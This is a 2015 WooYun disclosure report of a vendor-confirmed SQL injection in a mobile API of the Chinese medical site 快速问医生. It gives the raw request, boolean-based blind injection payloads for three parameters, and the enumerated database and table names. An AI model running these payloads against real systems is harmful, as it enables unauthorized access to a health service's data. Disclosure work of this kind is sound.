当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148501

漏洞标题:快速问医生某站SQL注射漏洞

相关厂商:快速问医生

漏洞作者: Hancock

提交时间:2015-10-22 10:34

修复时间:2015-12-07 11:00

公开时间:2015-12-07 11:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

快速问医生某站SQL注射漏洞:P

详细说明:

GET /common/lht?app=1&pos=0&os=a&token=562785a817d40&signature=72bc254bd98ae&once=1445430697 HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; MI 2S MIUI/JLB54.0)
Host: iapp.120.net
Connection: Keep-Alive
Accept-Encoding: gzip


三个参数、

---
Parameter: os (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: app=1&pos=0&os=a' AND 6032=6032 AND 'CVWl'='CVWl&token=562785a817d4
0&signature=72bc254bd98ae&once=1445430697
Parameter: pos (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: app=1&pos=0 AND 6322=6322&os=a&token=562785a817d40&signature=72bc25
4bd98ae&once=1445430697
Parameter: app (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: app=1 AND 7797=7797&pos=0&os=a&token=562785a817d40&signature=72bc25
4bd98ae&once=1445430697
---


漏洞证明:

database:

available databases [4]:
[*] `120app`
[*] information_schema
[*] other_app
[*] test


Database: 120app
[119 tables]
+---------------------------------+
| app_acne_category               |
| app_acne_recipe                 |
| app_acne_relate                 |
| app_acne_test                   |
| app_admin                       |
| app_admin_panel                 |
| app_admin_role                  |
| app_admin_role_priv             |
| app_appcenter                   |
| app_appcenter_category          |
| app_appcenter_comment           |
| app_appcenter_user_dynamic      |
| app_article                     |
| app_attachment                  |
| app_attachment_index            |
| app_cache                       |
| app_cesarean_content            |
| app_cold                        |
| app_cold_favorites              |
| app_cold_symptom                |
| app_cookbook                    |
| app_cookbook_info               |
| app_disease_eat                 |
| app_disease_eat_collect         |
| app_disease_eat_collocation     |
| app_disease_eat_diet            |
| app_disease_find_doctor         |
| app_disease_find_doctor_article |
| app_examine_article             |
| app_examine_list                |
| app_feedback                    |
| app_fx120_article               |
| app_ipbanned                    |
| app_linkage                     |
| app_log                         |
| app_login_register_log          |
| app_lose_weight                 |
| app_malady_doctor               |
| app_malady_food_info            |
| app_malady_food_method          |
| app_menu                        |
| app_notice                      |
| app_public_article              |
| app_session                     |
| app_shorturl                    |
| app_skin_product                |
| app_skin_test                   |
| app_skin_type                   |
| app_solid_food_article          |
| app_solid_food_cookbook         |
| app_test                        |
| app_times                       |
| mapp_check_version              |
| mapp_collect_count              |
| mapp_diet                       |
| mapp_diet_detail                |
| mapp_disease_count              |
| mapp_download_count             |
| mapp_extend                     |
| mapp_extend_count               |
| mapp_extend_count_new           |
| mapp_extend_new                 |
| mapp_feedback                   |
| mapp_feedback_type              |
| mapp_folk_prescription          |
| mapp_folk_prescription_detail   |
| mapp_help                       |
| mapp_hot_keyword                |
| mapp_hot_question               |
| mapp_list_new_words             |
| mapp_list_words                 |
| mapp_mobiles_area               |
| mapp_msg_count                  |
| mapp_pre_install                |
| mapp_product                    |
| mapp_product_comment            |
| mapp_product_detail             |
| mapp_product_ip                 |
| mapp_product_mobile             |
| mapp_pv_diet                    |
| mapp_pv_drug                    |
| mapp_pv_folk                    |
| mapp_search_count               |
| mapp_search_list                |
| mapp_shunt_count                |
| mapp_shunt_count_new            |
| mapp_tongji                     |
| mapp_yyaq_collect               |
| mapp_yyaq_common_disease        |
| mapp_yyck_call                  |
| mapp_yyck_call_new              |
| mapp_yyck_drug_comment          |
| mapp_yyck_drug_news             |
| mapp_yyck_drug_news2            |
| mapp_yyck_season_dis            |
| mapp_yyck_shop_goods            |
| mapp_yyck_shop_sort             |
| mapp_yyck_wqh_count             |
| mapp_zys_book_ds                |
| mapp_zys_book_qs                |
| mapp_zys_channel_count          |
| mapp_zys_count                  |
| mapp_zys_count_new              |
| mapp_zys_download_count         |
| mapp_zys_hot_keyword            |
| mapp_zys_keyword                |
| mapp_zys_keyword_count          |
| mapp_zys_new_area               |
| mapp_zys_pvs_dept               |
| mapp_zys_pvs_disease            |
| mapp_zys_pvs_doctor             |
| mapp_zys_pvs_hospital           |
| mapp_zys_pvs_question           |
| mapp_zys_question               |
| mapp_zys_reg_book               |
| mapp_zys_sort                   |
| mapp_zywb_buyservice            |
| mapp_zywb_count                 |
| mapp_zywb_user                  |
+---------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Hancock@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-23 10:58

厂商回复:

确认此漏洞,非常感谢

最新状态:

暂无

漏洞评价:

评价